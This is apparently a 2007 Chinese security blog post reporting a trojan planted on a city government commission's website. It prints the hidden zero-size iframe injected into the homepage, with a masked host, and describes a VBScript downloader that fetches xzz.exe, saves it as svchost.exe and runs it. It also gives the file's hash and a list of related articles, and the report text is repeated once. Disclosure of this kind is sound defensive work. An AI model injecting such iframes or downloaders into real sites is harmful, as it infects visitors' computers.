某市发改委网站被挂马 xzz.exe/Trojan-Downloader.Win32.Delf.aof
2007-01-24 21:35
302 查看
endurer 原创
2007-01-24 第1版
该网站首页中部被加入代码:
/-------
<iframe height=0 width=0 src="hxxp://www.g*ao**ju*n8***8*8.com/5**"></iframe>
-------/
hxxp://www.g*ao**ju*n8***8*8.com/5** 的内容包含用escape()加密的VBScript代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 xzz.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
xzz.exe 采用 bambam V0.01 -> bedrock * 加壳
/--------
文件说明符 : D:/test/xzz.exe
获取文件版本信息大小失败!
创建时间 : 2007-1-24 16:3:45
修改时间 : 2007-1-24 16:3:45
访问时间 : 2007-1-24 16:6:8
大小 : 17408 字节 17.0 KB
MD5 : 92fc95c7f131200877e13e7e912f7aa9
--------/
2007-01-24 第1版
该网站首页中部被加入代码:
/-------
<iframe height=0 width=0 src="hxxp://www.g*ao**ju*n8***8*8.com/5**"></iframe>
-------/
hxxp://www.g*ao**ju*n8***8*8.com/5** 的内容包含用escape()加密的VBScript代码,功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 xzz.exe,保存为 %temp%/svchost.exe,并利用Shell.Application 对象Q 的 ShellExecute 方法 来运行。
xzz.exe 采用 bambam V0.01 -> bedrock * 加壳
/--------
文件说明符 : D:/test/xzz.exe
获取文件版本信息大小失败!
创建时间 : 2007-1-24 16:3:45
修改时间 : 2007-1-24 16:3:45
访问时间 : 2007-1-24 16:6:8
大小 : 17408 字节 17.0 KB
MD5 : 92fc95c7f131200877e13e7e912f7aa9
--------/
相关文章推荐
- 一个挂马Trojan-Downloader.JS.Multi.ax的网站
- 某文学网站挂马logo.jpg/logo.exe
- [07-01-06]打开某IT技术问答网站时自动下载文件sinze.exe/Trojan-Dropper.Win32.Agent.awq
- 某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
- 某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
- 某可人官方网站挂马Trojan-PSW.Win32.OnLineGames.sbg
- 某笑话网站挂马Trojan-Downloader.Win32.Agent.rub
- 某旅游信息网站被挂马Trojan-PSW.Win32.QQRob.lp等
- 网站不收录可能是受同服务器上的挂马站牵连
- 网站QQ中奖挂马删除。2013-3-15
- 一个被挂上木马Trojan-Dropper.MSWord.Lafool.i的政府网站
- 织梦网站dedecms防止挂马的思路
- 常见JS挂马方法及如何防止网站被黑客挂马?
- 各种网站挂马的代码和原理
- Trojan-Proxy.Win32.Agent.if木马 -SVOHOST.EXE
- 网站被挂马的13个类型
- 最新网站被挂马怎么办,网站被人挂马了.
- 教你如何防止网站被挂马!
- 打包Asp.Net 网站成为一个exe 方便快捷的进行客户演示
- 打包Asp.Net 网站成为一个exe 方便快捷的进行客户演示[转]